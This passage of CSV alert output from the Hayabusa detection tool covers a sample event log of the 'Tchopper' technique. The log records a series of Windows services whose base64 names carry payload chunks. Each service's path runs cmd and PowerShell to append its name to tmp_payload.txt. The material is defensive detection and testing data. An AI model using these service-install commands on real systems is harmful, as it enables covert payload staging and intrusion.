IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:32.440 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 
ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:42.631 
+09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append 